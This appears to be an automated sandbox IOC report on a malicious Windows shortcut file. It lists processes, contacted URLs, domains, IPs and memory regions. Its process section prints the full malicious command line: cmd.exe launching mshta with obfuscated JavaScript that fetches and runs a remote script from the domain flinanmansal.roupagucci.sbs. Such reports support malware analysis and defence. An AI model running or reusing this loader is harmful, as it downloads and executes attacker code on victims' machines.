IOC Report
ProconGO1121082800.LnK.lnk

loading gif

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"
malicious
C:\Windows\System32\mshta.exe
MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
https://mmdhdsnappytv-vh.akamaihd.net
unknown
https://iframe.arkos
unknown
https://www.twitter.com/8
unknown
https://cm.g.double
unknown
https://iframe.arkoselabs.com/
unknown
https://twitter.com/$
unknown
https://media.riffsy.com
unknown
https://twitter.com/privacy
unknown
https://cm.g.doubleclick.net
unknown
https://ton-staging.pdxa.twitter.com
unknown
https://www.twitter.com/0
unknown
https://analytics.twitter.com
unknown
https://www.periscope.tv
unknown
https://dhdsnappytv-vh.akamaihd.net
unknown
https://localhost.twitter.com:3443
unknown
https://c.tenor.com
unknown
http://micrt.co
unknown
https://support.twitter.com/articles/20170514
unknown
https://vmap.snappytv.com
unknown
https://www.twitter.com/H
unknown
https://ads-twitter.com
unknown
https://www.pscp.tv
unknown
https://upload.x.com
unknown
https://vmap.grabyo.com
unknown
https://checkoutshopper-live.adyen.com
unknown
https://twitter.com/(
unknown
https://ton.twitter.com
unknown
https://recaptcha.net/recaptcha/
unknown
https://static.ads-twitter.com
unknown
https://vmapstage.snappytv.com
unknown
https://pay.twitter.com
unknown
https://api.x.ai
unknown
https://ton.x.com
unknown
https://api.twitter.com
unknown
https://twitter.com
unknown
https://upload.twitter.com
unknown
https://api-stream.twitter.com
unknown
https://vaultjs.apideck.com/
unknown
https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false
unknown
https://cards-frame.twitter.com
unknown
https://pay.x.com
unknown
https://sentry.io
unknown
https://mobile.twitter.com
unknown
https://ton-staging.pdxa.x.com
unknown
https://vmaprel.snappytv.com
unknown
https://www.twitter.com
unknown
https://flinanmansal.roupagucci.sbs/
unknown
https://dwo3ckksxlb0v.cloudfront.net;
unknown
https://ton-staging.atla.twitter.com
unknown
https://www.twitter.com/x
unknown
https://t.co/1/i/adsct;
unknown
https://business.twitter.com/en/help/troubleshooting/how-twitter-ads-work.html?ref=web-twc-ao-gbl-ad
unknown
https://pdhdsnappytv-vh.akamaihd.net
unknown
https://www.twitter.com(
unknown
HTtps://flinanmansal.roupagucci.sbs/?1/
unknown
https://www.twitter.com/
104.244.42.65
https://dwo3ckksxlb0v.cloudfront.net
unknown
https://flinanmansal.roupagucci.sbs/?1/9?s
unknown
https://scontent.xx.fbcdn.net
unknown
https://localhost.x.com:3443;
unknown
https://media.tenor.com
unknown
https://prod-periscope-profile.s3-us-west-2.amazonaws.com
unknown
https://legal.twitter.com/imprint.html
unknown
https://prod-periscope-profile.s1
unknown
https://twitter.com/
104.244.42.65
https://flinanmansal.roupagucci.sbs/?1/??u
unknown
https://flinanmansal.roupagucci.sbs/?1/
104.21.29.223
https://aa.twitter.com
unknown
https://platform-lookaside.fbsbx.com
unknown
https://analytics.x.com
unknown
https://caps.twitter.com
unknown
https://twitter.com/tos
unknown
https://abs.twimg.com/errors/logo46x38
unknown
https://aa.x.com
unknown
https://flinanmansal.roupagucci.sbs/?1/Ztu
unknown
https://mpdhdsnappytv-vh.akamaihd.net
unknown
https://api-stream.x.com
unknown
https://mobile.x.com
unknown
https://ton-staging.atla.x.com
unknown
https://www.google.com/recaptcha/
unknown
https://ads-api.x.com
unknown
https://ads-api.twitter.com
unknown
https://help.twitter.com/using-twitter/twitter-supported-browsers
unknown
https://abs.twimg.com/errors/logo46x38.png
unknown
https://scontent-sea1-1.xx.fbcdn.net
unknown
https://x.com
unknown
https://mdhdsnappytv-vh.akamaihd.net
unknown
https://caps.x.com
unknown
https://api.x.com
unknown
https://client-api.arkoselabs.com/
unknown
There are 80 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
twitter.com
104.244.42.65
flinanmansal.roupagucci.sbs
104.21.29.223
www.twitter.com
unknown

IPs

IP
Domain
Country
Malicious
104.244.42.65
twitter.com
United States
104.21.29.223
flinanmansal.roupagucci.sbs
United States

Memdumps

Base Address
Regiontype
Protect
Malicious
2A68F3B7000
heap
page read and write
29E8CE67000
heap
page read and write
2A68F164000
heap
page read and write
29E8CE9D000
heap
page read and write
A98324C000
stack
page read and write
2A68F158000
heap
page read and write
2A68F313000
heap
page read and write
29E8CE66000
heap
page read and write
2A68F16C000
heap
page read and write
2A68F153000
heap
page read and write
2A68F0D5000
trusted library allocation
page read and write
2A68F16C000
heap
page read and write
2A68F36A000
heap
page read and write
2A68F120000
heap
page read and write
2A68F3B5000
heap
page read and write
A98379E000
stack
page read and write
29E8D176000
heap
page read and write
2A68F170000
heap
page read and write
2A68F15B000
heap
page read and write
2A68F37B000
heap
page read and write
2A68F343000
heap
page read and write
2A68F3B5000
heap
page read and write
29E8CE9A000
heap
page read and write
2A68F343000
heap
page read and write
29E8CEC7000
heap
page read and write
2A68F120000
heap
page read and write
2A68F120000
heap
page read and write
2A68F175000
heap
page read and write
2A68F3B7000
heap
page read and write
29E8D02E000
heap
page read and write
2A68F318000
heap
page read and write
2A68F0F1000
heap
page read and write
2A68F16C000
heap
page read and write
2A68EED0000
heap
page read and write
2A68F15D000
heap
page read and write
29E8CE63000
heap
page read and write
2A68F311000
heap
page read and write
29E8CE6C000
heap
page read and write
2A68F310000
heap
page read and write
2A68F108000
heap
page read and write
29E8D014000
heap
page read and write
29E8CDD0000
heap
page read and write
29E8CE72000
heap
page read and write
29E8CE09000
heap
page read and write
2A68F38E000
heap
page read and write
29E8D130000
trusted library allocation
page read and write
2A68F371000
heap
page read and write
2A68F10A000
heap
page read and write
2A68F153000
heap
page read and write
2A68F3AD000
heap
page read and write
29E8CDE0000
heap
page read and write
29E8D029000
heap
page read and write
2A68F1F5000
trusted library allocation
page read and write
29E8CEC7000
heap
page read and write
29E8D150000
heap
page read and write
2A68F20F000
trusted library allocation
page read and write
2A68F3B6000
heap
page read and write
2A68F0F0000
heap
page read and write
A98314B000
stack
page read and write
2A68F170000
heap
page read and write
2A68F38E000
heap
page read and write
29E8CE0F000
heap
page read and write
2A68F3A8000
heap
page read and write
2A68F314000
heap
page read and write
2A68F15B000
heap
page read and write
29E8CE7E000
heap
page read and write
2A68F3A9000
heap
page read and write
2A68F318000
heap
page read and write
29E8CE7E000
heap
page read and write
29E8CE9B000
heap
page read and write
2A68F39C000
heap
page read and write
29E8CE25000
heap
page read and write
2A68F120000
heap
page read and write
2A68F3B1000
heap
page read and write
2A68F371000
heap
page read and write
2A68F108000
heap
page read and write
29E8CE7B000
heap
page read and write
29E8CEC7000
heap
page read and write
29E8CE92000
heap
page read and write
2A68F1F8000
trusted library allocation
page read and write
2A68F3B7000
heap
page read and write
2A68F120000
heap
page read and write
2A68EED4000
heap
page read and write
2A68F140000
heap
page read and write
2A6933D0000
heap
page read and write
2A68EC70000
heap
page read and write
2A68F108000
heap
page read and write
29E8CED2000
heap
page read and write
29E8CE63000
heap
page read and write
29E8CE72000
heap
page read and write
2A68F16C000
heap
page read and write
2A68F410000
remote allocation
page read and write
2A68ECA0000
heap
page read and write
2A68F15B000
heap
page read and write
2A68F120000
heap
page read and write
2A68F3B5000
heap
page read and write
29E8D140000
trusted library allocation
page read and write
29E8CE4B000
heap
page read and write
2A68F140000
heap
page read and write
2A68F205000
trusted library allocation
page read and write
2A68F3A3000
heap
page read and write
2A68F395000
heap
page read and write
2A68F0DD000
trusted library allocation
page read and write
2A68F3B5000
heap
page read and write
2A68F371000
heap
page read and write
29E8CEF0000
heap
page read and write
2A68F0DB000
trusted library allocation
page read and write
2A68F318000
heap
page read and write
29E8CED9000
heap
page read and write
29E8CE00000
heap
page read and write
29E8CE7E000
heap
page read and write
2A68F393000
heap
page read and write
2A68F343000
heap
page read and write
2A68F140000
heap
page read and write
2A68F343000
heap
page read and write
2A68F3AD000
heap
page read and write
29E8D010000
heap
page read and write
2A68F170000
heap
page read and write
2A68F15B000
heap
page read and write
2A68F250000
trusted library allocation
page execute
2A68F39C000
heap
page read and write
29E8CE6C000
heap
page read and write
2A68F3A8000
heap
page read and write
29E8CFD0000
heap
page read and write
2A68F108000
heap
page read and write
29E8CE6C000
heap
page read and write
29E8D17E000
heap
page read and write
2A68F391000
heap
page read and write
2A68F153000
heap
page read and write
2A68F109000
heap
page read and write
29E8CE92000
heap
page read and write
A98369E000
stack
page read and write
2A68F371000
heap
page read and write
2A68F3A3000
heap
page read and write
2A68F164000
heap
page read and write
2A68F389000
heap
page read and write
2A68F0FA000
heap
page read and write
2A68F37D000
heap
page read and write
A98334E000
stack
page read and write
2A68F103000
heap
page read and write
2A68F3AD000
heap
page read and write
29E8CE55000
heap
page read and write
2A68F386000
heap
page read and write
A98359F000
stack
page read and write
29E8D154000
heap
page read and write
2A68F316000
heap
page read and write
2A68F372000
heap
page read and write
2A68F120000
heap
page read and write
29E8CE72000
heap
page read and write
29E8CE4F000
heap
page read and write
2A68F164000
heap
page read and write
29E8CE72000
heap
page read and write
29E8D027000
heap
page read and write
2A68F39C000
heap
page read and write
2A68F343000
heap
page read and write
2A68F164000
heap
page read and write
2A68F384000
heap
page read and write
29E8CED4000
heap
page read and write
29E8CED9000
heap
page read and write
2A68F3B7000
heap
page read and write
29E8CE7E000
heap
page read and write
2A68F410000
remote allocation
page read and write
29E8CEF0000
heap
page read and write
29E8CE92000
heap
page read and write
2A68F175000
heap
page read and write
2A68F1F0000
trusted library allocation
page read and write
29E8D031000
heap
page read and write
2A68F175000
heap
page read and write
29E8D15D000
heap
page read and write
2A68F318000
heap
page read and write
2A68F3A3000
heap
page read and write
2A68F161000
heap
page read and write
2A68F163000
heap
page read and write
2A68F379000
heap
page read and write
29E8CED2000
heap
page read and write
2A68F158000
heap
page read and write
2A68F393000
heap
page read and write
2A68F158000
heap
page read and write
29E8D17B000
heap
page read and write
2A68F3B5000
heap
page read and write
2A68F39C000
heap
page read and write
29E8CEF0000
heap
page read and write
2A68F0D3000
trusted library allocation
page read and write
2A692E62000
trusted library allocation
page read and write
2A68F395000
heap
page read and write
A982CFE000
stack
page read and write
2A68F153000
heap
page read and write
29E8CE63000
heap
page read and write
2A68F140000
heap
page read and write
2A68F15E000
heap
page read and write
29E8CE92000
heap
page read and write
2A68F3A3000
heap
page read and write
2A68F10A000
heap
page read and write
2A68F3A4000
heap
page read and write
29E8CE25000
heap
page read and write
29E8CEC7000
heap
page read and write
2A68F15B000
heap
page read and write
A9829D5000
stack
page read and write
2A68F270000
heap
page readonly
2A68F3B5000
heap
page read and write
2A68F318000
heap
page read and write
29E8D170000
heap
page read and write
2A68F0D1000
trusted library allocation
page read and write
2A68F104000
heap
page read and write
29E8CED9000
heap
page read and write
2A68F108000
heap
page read and write
2A68F410000
remote allocation
page read and write
2A68F103000
heap
page read and write
A982DFE000
stack
page read and write
2A68F3B0000
heap
page read and write
2A68F158000
heap
page read and write
2A68F0FA000
heap
page read and write
2A68F0D9000
trusted library allocation
page read and write
There are 203 hidden memdumps, click here to show them.